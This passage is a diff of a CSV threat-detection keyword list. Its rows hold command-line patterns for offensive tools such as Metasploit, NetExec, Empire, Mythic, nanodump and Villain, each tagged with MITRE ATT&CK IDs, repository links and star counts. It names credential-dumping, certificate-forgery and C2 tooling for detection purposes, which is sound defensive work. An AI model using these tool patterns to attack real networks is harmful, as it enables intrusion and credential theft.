TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "* --msfoptions *","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" -"* --msf-path*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --msf-path*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "* Mshikaki.cpp*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","0","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" "* msrpc-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* mssql * -u * -p * -M met_inject*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* mssql * -u * -p * -M mssql_priv*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* mssql * -u * -p * -M web_delivery *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* mssql * -u * -p * -M met_inject*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* mssql * -u * -p * -M mssql_priv*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* mssql * -u * -p * -M web_delivery *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* ms-sql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-dac.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -1316,12 +1316,12 @@ "* mysql-variables.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-vuln-cve2012-2122.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mystikal.py*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","0","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" -"* mythic start*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"* mythic_container.Mythic*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"* mythic_payloadtype_container*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"* mythic-cli*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"* mythic start*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"* mythic_container.Mythic*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"* mythic_payloadtype_container*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"* mythic-cli*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "* -n *TotallyLegitTool*","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","0","N/A","N/A","4","375","147","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z" -"* --name covenant *","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"* --name covenant *","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "* nanodump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "* nanodump/*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "* nat-pmp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -1329,7 +1329,7 @@ "* nbd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -NBNSBruteForce*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "* nbns-interfaces.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -NBNSTTL *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -NBNSTTL *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* nbstat.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ncp-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ncp-serverinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -1342,8 +1342,8 @@ "* netbus-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* netbus-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* netbus-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --netcat-port *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"* netripper*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --netcat-port *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"* netripper*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* --NewCertPath *.pfx --NewCertPassword *","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "* NewLocalAdmin(*","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" "* nexpose-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -1357,21 +1357,21 @@ "* nje-pass-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --nla-redirection-host * --nla-redirection-port *","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" "* nntp-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -NoBase64 *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* --no-bruteforce *","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* --no-bruteforce --continue-on-success*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* -NoBase64 *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --no-bruteforce *","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --no-bruteforce --continue-on-success*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that 